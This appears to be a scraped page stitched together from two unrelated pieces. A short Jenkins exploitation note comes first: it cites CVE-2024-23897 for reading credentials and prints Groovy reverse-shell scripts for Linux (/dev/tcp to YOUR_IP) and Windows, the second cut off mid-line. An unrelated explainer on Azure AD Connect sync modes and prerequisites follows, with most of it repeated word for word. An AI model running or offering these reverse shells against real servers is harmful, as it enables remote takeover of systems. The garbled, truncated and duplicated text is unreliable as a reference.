Exploiting Jenkins / CVE-2024-23897 Often the script console is accessible without authentication due to misconfig on http://JENKINS_IP/script If you don't have access to script console and the version is vulnerable to CVE-2024-23897 , then exploit it to read files and get authentication credentials for Jenkins, (explained below) Groovy scripts can be executed from the script console. To get a reverse shell, execute the following script. For Linux, r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/YOUR_IP/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() For Windows, String host="YOUR_IP"; int port=PORT; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStrea...
The Azure AD Connect synchronization service is used to synchronize identity data between your on-premise environment and Azure Active Directory.
There are two components for this service
Password Hash Synchronization
Here Azure AD Connect synchronizes a hash, of the hash, of a users password from an on-premises Active Directory instance to a cloud-based Azure AD instance.
The advantage is that you only need to maintain one password for both authentication in your on-premise environments and in the cloud.If a user change his/her password on the On-premise AD, the password will be synced onto Azure AD. But the reverse will not happen.
Pass-through Authentication
This is kind of similar to password hash synchronization, but here the users’ passwords is directly validated against the on-premise Active Directory. Means, when a user try to authenticate, the authentication request will be sent to the on-premise Active directory.
Password Write-Back
Password write-back is a feature enabled with Azure AD Connect that allows password changes in the cloud to be written back to an existing on-premises directory in real time. In this configuration, as users change or reset their passwords using Self Service Password Reset (SSPR) in the cloud, the updated passwords also written back to the on-premises AD DS environment. This can be configured along with Password Hash Synchronization & Pass-through Authentication if required.
There are two components for this service
- Azure AD Connect sync component – This is installed on the on-premise environment, recommended to be installed on a domain joined separate server and not on AD server directly.
- Azure AD Connect sync service – This service runs in Azure AD.
- An Azure AD tenant
- You need to add and verify your domain in Azure AD
- The Azure AD Connect sync component must be installed on a Windows Server 2012 Standard or later (On-Premises). The server must have the full GUI installed. The server must be domain joined.Recommended no to install in the AD DC server directly.
- Azure AD Global Administrator account for the Azure AD tenant. The account should be a school or organization account and cannot be a Microsoft account
- An Enterprise Administrator account for the on-premise Active Directory
- The Azure AD Connect server needs DNS resolution for both intranet and internet. The DNS server must be able to resolve names both to your on-premises Active Directory and the Azure AD endpoints. When a user try to authenticate, the sign in page will be redirected to the On-Premises URL, based on your configuration.
Password Hash Synchronization
Here Azure AD Connect synchronizes a hash, of the hash, of a users password from an on-premises Active Directory instance to a cloud-based Azure AD instance.
The advantage is that you only need to maintain one password for both authentication in your on-premise environments and in the cloud.If a user change his/her password on the On-premise AD, the password will be synced onto Azure AD. But the reverse will not happen.
Pass-through Authentication
This is kind of similar to password hash synchronization, but here the users’ passwords is directly validated against the on-premise Active Directory. Means, when a user try to authenticate, the authentication request will be sent to the on-premise Active directory.
Password Write-Back
Password write-back is a feature enabled with Azure AD Connect that allows password changes in the cloud to be written back to an existing on-premises directory in real time. In this configuration, as users change or reset their passwords using Self Service Password Reset (SSPR) in the cloud, the updated passwords also written back to the on-premises AD DS environment. This can be configured along with Password Hash Synchronization & Pass-through Authentication if required.